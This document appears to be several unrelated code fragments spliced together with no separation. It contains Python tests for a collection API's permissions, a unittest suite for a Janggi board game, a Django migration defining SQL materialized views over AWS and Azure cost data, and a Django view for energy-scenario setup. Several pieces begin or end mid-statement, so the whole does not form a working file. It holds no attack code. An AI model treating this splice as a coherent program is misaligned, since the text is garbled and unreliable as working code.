response.data["collection"][field] def test_get_collection_bad(): """ Request collections using bad identifiers. All are expected to return 404. """ session = requests.Session() for _ in range(2): response = make_request(session, f"/api/v1/collection/{uuid.uuid4()}") assert response.code == 404 assert not response.data for _ in range(2): response = make_request(session, f"/api/v1/collection/{random_string()}") assert response.code == 404 assert not response.data def test_update_collection_permissions(mdb, collection_for_tests): """ Confirm that only the intended users can update collections. Checks: * DATA_MANAGEMENT can edit any collection * DATA_EDIT and listed in editors required * Listed in editors, not DATA_EDIT - forbidden * DATA_EDIT, not listed in editors - forbidden """ session = requests.Session() coll_id = collection_for_tests helpers.as_user(session, USERS["data"]) indata = {"collection": {"title": "Update any", "editors": helpers.users_uuids()}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) assert response.code == 200 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] == "Update any" assert [str(entry) for entry in new_collection["editors"]] == helpers.users_uuids() for role in USERS: helpers.as_user(session, USERS[role]) indata = {"collection": {"title": f"Test title - updated by {role}"}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) if role in ("edit", "data", "root"): assert response.code == 200 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] == f"Test title - updated by {role}" elif role == "no-login": assert response.code == 401 assert not response.data else: assert response.code == 403 assert not response.data mdb["collections"].update_one({"_id": coll_id}, 
{"$set": {"editors": []}}) print(mdb["collections"].find_one({"_id": coll_id})) helpers.as_user(session, USERS["edit"]) indata = {"collection": {"title": "Test title - updated by edit"}} response = helpers.make_request( session, f"/api/v1/collection/{coll_id}", method="PATCH", data=indata, ret_json=True, ) assert response.code == 403 assert not response.data new_collection = mdb["collections"].find_one({"_id": coll_id}) assert new_collection["title"] != indata["collection"]["title"] def test_update_collection_data(mdb, collection_for_tests): """ Confirm that all fields can be updated correctly. Checks: * Make update with no content -> 200 - Confirm that log was not created * Make update with all relevant fields changed -> 200 - Confirm that log was
place for eastern blue elephant g.make_move('e4', 'e5') # red soldier moves to make place for eastern red elephant try: valid_move = g.make_move('g10','e7') #blue elephant moves self.assertIs(valid_move, True) except: self.fail("Blue Elephant from east is either not transposed correctly with Horse in the inital setup or cannot perform valid moves") try: valid_move = g.make_move('g1','e4') #red elephant moves self.assertIs(valid_move, True) except: self.fail("Red Elephant from east is either not transposed correctly with Horse in the inital setup or cannot perform valid moves") # @visibility('after_due_date') def test_that_a_check_by_a_cannon_outside_the_palace_is_detected(self): """RULES: Check by a cannon outside the palace is detected""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','e3') #red g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('e3', 'e6') #red cannon captures soldier -- check here g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse self.assertTrue(g.make_move('e6','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for 
blue") # @visibility('after_due_date') def test_that_a_check_by_a_horse_outside_the_palace_is_detected(self): """RULES: Check by a horse outside the palace is detected""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','e3') #red g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('e3', 'e6') #red cannon captures soldier -- check here g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('e6','e3') #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here g.make_move('e9','d9') #blue general moves to counter check g.make_move('c4','b6') #red horse moves g.make_move('g7','f7') #blue soldier moves g.make_move('e4','e5') #red moves g.make_move('f7','e7') #blue moves g.make_move('e5','e6') #red moves g.make_move('d9','e9') #blue general moves g.make_move('b6','a8') #red horse moves southwest g.make_move('d8','b7') #blue horse moves g.make_move('a8','b10') #red horse moves g.make_move('e9','e9') #blue passes g.make_move('b10','c8') #red horse puts blue general in check try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Horse outside the palace and is_in_check should return True for blue") # @visibility('after_due_date') def 
test_that_countering_the_check_by_capturing_the_cannon_is_detected_correctly(self): """RULES: Countering the check by capturing the cannon is detected correctly""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','b3') #red passes g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('b3','b3') #red passes g.make_move('e6', 'f6') #blue soldier moves sidewways g.make_move('b3','b3') #red passes g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('d1','d2') #red moves g.make_move('e9','e9') #blue passes g.make_move('d2','d3') #red moves self.assertTrue(g.make_move('e9','e9')) #blue passes self.assertTrue(g.make_move('d3','d3')) #red passes #prep moves to kill the cannon in future self.assertTrue(g.make_move('g7','g6')) #blue soldier moves self.assertTrue(g.make_move('f4','g4')) #red soldier moves sideways self.assertTrue(g.make_move('f6','f5')) #blue soldier moves self.assertTrue(g.make_move('g4','g5')) #red soldier moves self.assertTrue(g.make_move('g8','f6')) #blue horse moves self.assertTrue(g.make_move('e2','e2')) #red passes self.assertTrue(g.make_move('f6','d5')) #blue horse moves self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: 
self.assertIs(g.is_in_check('blue'), True) except: self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue") counter_check_move = g.make_move('d5','e3') #evade the cannon check by capturing the cannon using a horse self.assertTrue(counter_check_move) try: self.assertIs(g.is_in_check('red'), False) except: self.fail("Red General is not in check and yet is_in_check returns True for red") try: self.assertIs(g.is_in_check('blue'), False) except: self.fail("Countering of the check by cannon by capturing it should be detected correctly and is_in_check should return False for blue") try: self.assertEqual(g.get_game_state().upper(),'UNFINISHED') except: self.fail("Game state should be UNFINISHED when a general is in check but not checkmated") # @visibility('after_due_date') def test_that_countering_the_check_by_blocking_the_cannon_is_detected_correctly(self): """RULES: Countering the check by blocking the cannon is detected correctly""" g = JanggiGame() g.make_move('c7','c6') #blue g.make_move('c1','d3') #red g.make_move('b10','d7') #blue g.make_move('b3','b3') #red passes g.make_move('c10','d8') g.make_move('h1','g3') g.make_move('e7','e6') g.make_move('b3','b3') #red passes g.make_move('e6', 'f6') #blue soldier moves sidewways g.make_move('b3','b3') #red passes g.make_move('h8','c8') #blue cannon moves -- check here g.make_move('d3','e5') #red g.make_move('c8','c4') #blue cannon captures red soldier -- check here g.make_move('e5','c4') #red horse captures blue cannon g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('d1','d2') #red moves g.make_move('e9','e9') #blue passes g.make_move('d2','d3') #red moves g.make_move('e9','e9') #blue passes self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here try: 
    # @visibility('after_due_date')
    def test_that_check_forces_a_move_to_be_made_to_counter_the_check(self):
        """RULES: Check forces a move to be made to counter the check"""
        # Scripted opening: manoeuvre a red cannon into position to check the
        # blue general, using b3->b3 "pass" moves to burn red turns.
        g = JanggiGame()
        g.make_move('c7','c6') #blue
        g.make_move('c1','d3') #red
        g.make_move('b10','d7') #blue
        g.make_move('b3','b3') #red passes
        g.make_move('c10','d8')  # blue
        g.make_move('h1','g3')  # red
        g.make_move('e7','e6')  # blue
        g.make_move('b3','b3') #red passes
        g.make_move('e6', 'f6') #blue soldier moves sidewways
        g.make_move('b3','b3') #red passes
        g.make_move('h8','c8') #blue cannon moves -- check here
        g.make_move('d3','e5') #red
        g.make_move('c8','c4') #blue cannon captures red soldier -- check here
        g.make_move('e5','c4') #red horse captures blue cannon
        g.make_move('i10','i8') #blue chariot moves
        g.make_move('g4','f4')  # red
        g.make_move('i8','f8') #blue chariot moves sideway
        g.make_move('g3','h5')  # red
        g.make_move('h10','g8') #blue horse
        g.make_move('d1','d2') #red moves
        g.make_move('e9','e9') #blue passes
        g.make_move('d2','d3') #red moves
        g.make_move('e9','e9') #blue passes
        self.assertTrue(g.make_move('b3','e3')) #red CHECKS blue using a cannon -- special test for checks using a cannon -- check here
        # A check that is not checkmate must leave the game UNFINISHED.
        try:
            self.assertEqual(g.get_game_state().upper(),'UNFINISHED')
        except:
            self.fail("Game state should be UNFINISHED when a general is in check but not checkmated")
        try:
            self.assertIs(g.is_in_check('red'), False)
        except:
            self.fail("Red General is not in check and yet is_in_check returns True for red")
        try:
            self.assertIs(g.is_in_check('blue'), True)
        except:
            self.fail("Blue General is in check with a Cannon outside the palace and is_in_check should return True for blue")
        # While in check, every blue move that does not resolve the check
        # must be rejected (make_move returns False).
        non_counter_check_move = g.make_move('f8','f7') #a move that does not evade the check
        try:
            self.assertFalse(non_counter_check_move)
        except:
            self.fail("Blue should be forced to make a move that evades a check when checked")
        non_counter_check_move = g.make_move('e9','e10') #general moves not countering the check
        try:
            self.assertFalse(non_counter_check_move)
        except:
            self.fail("Blue should be forced to make a move that evades a check when checked")
        non_counter_check_move = g.make_move('f6','f5') #soldier moves not countering the check
        try:
            self.assertFalse(non_counter_check_move)
        except:
            self.fail("Blue should be forced to make a move that evades a check when checked")
g.make_move('i10','i8') #blue chariot moves g.make_move('g4','f4') g.make_move('i8','f8') #blue chariot moves sideway g.make_move('g3','h5') g.make_move('h10','g8') #blue horse g.make_move('e6','e3') #red CHECKS blue using a cannon
ON reporting_aws_compute_summary (usage_start, instance_type)
;

CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_service AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family, instance_type) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        product_code,
        product_family,
        instance_type,
        array_agg(DISTINCT resource_id) as resource_ids,
        count(DISTINCT resource_id) as resource_count,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary,
        unnest(resource_ids) resource_id
    -- Get data for this month or last month
    WHERE instance_type IS NOT NULL
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), product_code, product_family, instance_type
)
;

CREATE UNIQUE INDEX aws_compute_summary_service
    ON reporting_aws_compute_summary_by_service (usage_start, product_code, product_family, instance_type)
;

CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_account AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, instance_type) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        usage_account_id,
        account_alias_id,
        instance_type,
        array_agg(DISTINCT resource_id) as resource_ids,
        count(DISTINCT resource_id) as resource_count,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary,
        unnest(resource_ids) resource_id
    -- Get data for this month or last month
    WHERE instance_type IS NOT NULL
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), usage_account_id, account_alias_id, instance_type
)
;

CREATE UNIQUE INDEX aws_compute_summary_account
    ON reporting_aws_compute_summary_by_account (usage_start, usage_account_id, account_alias_id, instance_type)
;

CREATE MATERIALIZED VIEW reporting_aws_compute_summary_by_region AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, instance_type) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        region,
        availability_zone,
        instance_type,
        array_agg(DISTINCT resource_id) as resource_ids,
        count(DISTINCT resource_id) as resource_count,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary,
        unnest(resource_ids) resource_id
    -- Get data for this month or last month
    WHERE instance_type IS NOT NULL
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), region, availability_zone, instance_type
)
;

CREATE UNIQUE INDEX aws_compute_summary_region
    ON reporting_aws_compute_summary_by_region (usage_start, region, availability_zone, instance_type)
;

CREATE MATERIALIZED VIEW reporting_aws_storage_summary AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), product_family) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        product_family,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_family LIKE '%Storage%'
        AND unit = 'GB-Mo'
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), product_family
)
;

CREATE UNIQUE INDEX aws_storage_summary
    ON reporting_aws_storage_summary (usage_start, product_family)
;

CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_service AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), product_code, product_family) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        product_code,
        product_family,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_family LIKE '%Storage%'
        AND unit = 'GB-Mo'
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), product_code, product_family
)
;

CREATE UNIQUE INDEX aws_storage_summary_service
    ON reporting_aws_storage_summary_by_service (usage_start, product_code, product_family)
;

CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_account AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), usage_account_id, account_alias_id, product_family) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        usage_account_id,
        account_alias_id,
        product_family,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_family LIKE '%Storage%'
        AND unit = 'GB-Mo'
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), usage_account_id, account_alias_id, product_family
)
;

CREATE UNIQUE INDEX aws_storage_summary_account
    ON reporting_aws_storage_summary_by_account (usage_start, usage_account_id, account_alias_id, product_family)
;

CREATE MATERIALIZED VIEW reporting_aws_storage_summary_by_region AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), region, availability_zone, product_family) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        region,
        availability_zone,
        product_family,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_family LIKE '%Storage%'
        AND unit = 'GB-Mo'
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), region, availability_zone, product_family
)
;

CREATE UNIQUE INDEX aws_storage_summary_region
    ON reporting_aws_storage_summary_by_region (usage_start, region, availability_zone, product_family)
;

CREATE MATERIALIZED VIEW reporting_aws_network_summary AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        product_code,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_code IN ('AmazonVPC','AmazonCloudFront','AmazonRoute53','AmazonAPIGateway')
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), product_code
)
;

CREATE UNIQUE INDEX aws_network_summary
    ON reporting_aws_network_summary (usage_start, product_code)
;

CREATE MATERIALIZED VIEW reporting_aws_database_summary AS(
    SELECT row_number() OVER(ORDER BY date(usage_start), product_code) as id,
        date(usage_start) as usage_start,
        date(usage_start) as usage_end,
        product_code,
        sum(usage_amount) as usage_amount,
        max(unit) as unit,
        sum(unblended_cost) as unblended_cost,
        sum(markup_cost) as markup_cost,
        max(currency_code) as currency_code
    FROM reporting_awscostentrylineitem_daily_summary
    -- Get data for this month or last month
    WHERE product_code IN ('AmazonRDS','AmazonDynamoDB','AmazonElastiCache','AmazonNeptune','AmazonRedshift','AmazonDocumentDB')
        AND (
            date_trunc('month', usage_start) = date_trunc('month', now())
            OR
            date_trunc('month', usage_start) = date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
        )
    GROUP BY date(usage_start), product_code
)
;

CREATE UNIQUE INDEX aws_database_summary
    ON reporting_aws_database_summary (usage_start, product_code)
;
"""
        ),
        # Materialized views that union OCP-on-AWS and OCP-on-Azure daily
        # summaries into the combined "ocpall" views, limited to the current
        # and previous month of data.
        migrations.RunSQL(
            sql="""
CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_daily_summary AS (
    SELECT row_number() OVER () as id,
        lids.*
    FROM (
        SELECT 'AWS' as source_type,
            cluster_id,
            cluster_alias,
            namespace,
            node,
            resource_id,
            usage_start,
            usage_end,
            usage_account_id,
            account_alias_id,
            product_code,
            product_family,
            instance_type,
            region,
            availability_zone,
            tags,
            usage_amount,
            unit,
            unblended_cost,
            markup_cost,
            currency_code,
            shared_projects,
            project_costs
        FROM reporting_ocpawscostlineitem_daily_summary
        WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)

        UNION

        SELECT 'Azure' as source_type,
            cluster_id,
            cluster_alias,
            namespace,
            node,
            resource_id,
            usage_start,
            usage_end,
            subscription_guid as usage_account_id,
            NULL::int as account_alias_id,
            service_name as product_code,
            NULL as product_family,
            instance_type,
            resource_location as region,
            NULL as availability_zone,
            tags,
            usage_quantity as usage_amount,
            unit_of_measure as unit,
            pretax_cost as unblended_cost,
            markup_cost,
            currency as currency_code,
            shared_projects,
            project_costs
        FROM reporting_ocpazurecostlineitem_daily_summary
        WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
    ) AS lids
)
;

CREATE MATERIALIZED VIEW reporting_ocpallcostlineitem_project_daily_summary AS (
    SELECT row_number() OVER () as id,
        lids.*
    FROM (
        SELECT 'AWS' as source_type,
            cluster_id,
            cluster_alias,
            data_source,
            namespace,
            node,
            pod_labels,
            resource_id,
            usage_start,
            usage_end,
            usage_account_id,
            account_alias_id,
            product_code,
            product_family,
            instance_type,
            region,
            availability_zone,
            usage_amount,
            unit,
            unblended_cost,
            project_markup_cost,
            pod_cost,
            currency_code
        FROM reporting_ocpawscostlineitem_project_daily_summary
        WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)

        UNION

        SELECT 'Azure' as source_type,
            cluster_id,
            cluster_alias,
            data_source,
            namespace,
            node,
            pod_labels,
            resource_id,
            usage_start,
            usage_end,
            subscription_guid as usage_account_id,
            NULL::int as account_alias_id,
            service_name as product_code,
            NULL as product_family,
            instance_type,
            resource_location as region,
            NULL as availability_zone,
            usage_quantity as usage_amount,
            unit_of_measure as unit,
            pretax_cost as unblended_cost,
            project_markup_cost,
            pod_cost,
            currency as currency_code
        FROM reporting_ocpazurecostlineitem_project_daily_summary
        WHERE usage_start >= date_trunc('month', date_trunc('month', now()) - INTERVAL '1' DAY)
    ) AS lids
)
;
"""
        ),
        # Unmanaged Django models mirroring the materialized views above
        # ("managed": False — Django never migrates these tables itself).
        migrations.CreateModel(
            name="AWSCostSummaryByAccount",
            fields=[
                ("id", models.IntegerField(primary_key=True, serialize=False)),
                ("usage_start", models.DateTimeField()),
                ("usage_end", models.DateTimeField(null=True)),
                ("usage_account_id", models.CharField(max_length=50)),
                ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("currency_code", models.CharField(max_length=10)),
            ],
            options={"db_table": "reporting_aws_cost_summary_by_account", "managed": False},
        ),
        migrations.CreateModel(
            name="AWSComputeSummary",
            fields=[
                ("id", models.IntegerField(primary_key=True, serialize=False)),
                ("usage_start", models.DateTimeField()),
                ("usage_end", models.DateTimeField(null=True)),
                ("instance_type", models.CharField(max_length=50, null=True)),
                (
                    "resource_ids",
                    django.contrib.postgres.fields.ArrayField(
                        base_field=models.CharField(max_length=256), null=True, size=None
                    ),
                ),
                ("resource_count", models.IntegerField(null=True)),
                ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("unit", models.CharField(max_length=63, null=True)),
                ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("currency_code", models.CharField(max_length=10)),
            ],
            options={"db_table": "reporting_aws_compute_summary", "managed": False},
        ),
        migrations.CreateModel(
            name="AWSComputeSummaryByAccount",
            fields=[
                ("id", models.IntegerField(primary_key=True, serialize=False)),
                ("usage_start", models.DateTimeField()),
                ("usage_end", models.DateTimeField(null=True)),
                ("usage_account_id", models.CharField(max_length=50)),
                ("instance_type", models.CharField(max_length=50, null=True)),
                (
                    "resource_ids",
                    django.contrib.postgres.fields.ArrayField(
                        base_field=models.CharField(max_length=256), null=True, size=None
                    ),
                ),
                ("resource_count", models.IntegerField(null=True)),
                ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("unit", models.CharField(max_length=63, null=True)),
                ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("currency_code", models.CharField(max_length=10)),
            ],
            options={"db_table": "reporting_aws_compute_summary_by_account", "managed": False},
        ),
        migrations.CreateModel(
            name="AWSComputeSummaryByRegion",
            fields=[
                ("id", models.IntegerField(primary_key=True, serialize=False)),
                ("usage_start", models.DateTimeField()),
                ("usage_end", models.DateTimeField(null=True)),
                ("region", models.CharField(max_length=50, null=True)),
                ("availability_zone", models.CharField(max_length=50, null=True)),
                ("instance_type", models.CharField(max_length=50, null=True)),
                (
                    "resource_ids",
                    django.contrib.postgres.fields.ArrayField(
                        base_field=models.CharField(max_length=256), null=True, size=None
                    ),
                ),
                ("resource_count", models.IntegerField(null=True)),
                ("usage_amount", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("unit", models.CharField(max_length=63, null=True)),
                ("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
                ("currency_code", models.CharField(max_length=10)),
            ],
            options={"db_table": "reporting_aws_compute_summary_by_region", "managed": False},
        ),
        migrations.CreateModel(
            name="AWSComputeSummaryByService",
            fields=[
                ("id", models.IntegerField(primary_key=True, serialize=False)),
                ("usage_start", models.DateTimeField()),
                ("usage_end", models.DateTimeField(null=True)),
                ("product_code", models.CharField(max_length=50)),
"providers": { "dso": _("Electricity DSO"), "gas_dso": _("Gas DSO"), "h2_dso": _("H2 DSO"), "heat_dso": _("Heat DSO"), }, "production": { "pv_plant": _("PV Plant"), "wind_plant": _("Wind Plant"), "biogas_plant": _("Biogas Plant"), "geothermal_conversion": _("Geothermal Conversion"), "solar_thermal_plant": _("Solar Thermal Plant"), }, "conversion": { # "transformer_station_in": _("Transformer Station (in)"), # "transformer_station_out": _("Transformer Station (out)"), # "storage_charge_controller_in": _("Storage Charge Controller (in)"), # "storage_charge_controller_out": _("Storage Charge Controller (out)"), # "solar_inverter": _("Solar Inverter"), "diesel_generator": _("Diesel Generator"), "fuel_cell": _(" Fuel Cell"), "gas_boiler": _("Gas Boiler"), "electrolyzer": _("Electrolyzer"), "heat_pump": _("Heat Pump"), }, "storage": { "bess": _("Electricity Storage"), # "gess": _("Gas Storage"), # "h2ess": _("H2 Storage"), "hess": _("Heat Storage"), }, "demand": { "demand": _("Electricity Demand"), # "gas_demand": _("Gas Demand"), # "h2_demand": _("H2 Demand"), "heat_demand": _("Heat Demand"), }, "bus": {"bus": _("Bus")}, } group_names = {group: _(group) for group in components.keys()} # TODO: if the scenario exists, load it, otherwise default form if request.method == "POST": # called by function save_topology() in templates/scenario/scenario_step2.html scenario = get_object_or_404(Scenario, pk=scen_id) if request.user != scenario.project.user: raise PermissionDenied topologies = json.loads(request.body) node_list = [NodeObject(topology) for topology in topologies] # delete objects from database which were deleted by the user update_deleted_objects_from_database(scen_id, node_list) # Make sure there are no connections in the Database to prevent inserting the same connections upon updating. 
ConnectionLink.objects.filter(scenario_id=scen_id).delete() for node_obj in node_list: node_obj.create_connection_links(scen_id) # node_obj.assign_asset_to_proper_group(node_to_db_mapping_dict) return JsonResponse({"success": True}, status=200) else: scenario = get_object_or_404(Scenario, pk=scen_id) # if a simulation object linked to this scenario exists, all steps have been already fullfilled qs_sim = Simulation.objects.filter(scenario=scenario) if qs_sim.exists(): max_step = 5 # this is a dict with keys "busses", "assets" and "links" topology_data_list = load_scenario_topology_from_db(scen_id) return render( request, f"scenario/scenario_step{step_id}.html", { "scenario": scenario, "scen_id": scen_id, "proj_id": scenario.project.id, "proj_name": scenario.project.name, "topology_data_list": json.dumps(topology_data_list), "step_id": step_id, "step_list": STEP_LIST, "max_step": max_step, "components": components, "group_names": group_names, }, ) @login_required @require_http_methods(["GET", "POST"]) def scenario_create_constraints(request, proj_id, scen_id, step_id=3, max_step=4): constraints_labels = { "minimal_degree_of_autonomy": _("Minimal degree of autonomy"), "minimal_renewable_factor": _("Minimal share of renewables"), "maximum_emissions": _("Maximal CO2 emissions"), "net_zero_energy": _("Net zero energy system"), } constraints_forms = { "minimal_degree_of_autonomy": MinDOAConstraintForm, "minimal_renewable_factor": MinRenewableConstraintForm, "maximum_emissions": MaxEmissionConstraintForm, "net_zero_energy": NZEConstraintForm, } constraints_models = { "minimal_degree_of_autonomy": MinDOAConstraint, "minimal_renewable_factor": MinRenewableConstraint, "maximum_emissions": MaxEmissionConstraint, "net_zero_energy": NZEConstraint, } scenario = get_object_or_404(Scenario, pk=scen_id) if (scenario.project.user != request.user) and ( request.user not in scenario.project.viewers.all() ): raise PermissionDenied qs_sim = Simulation.objects.filter(scenario=scenario) if 
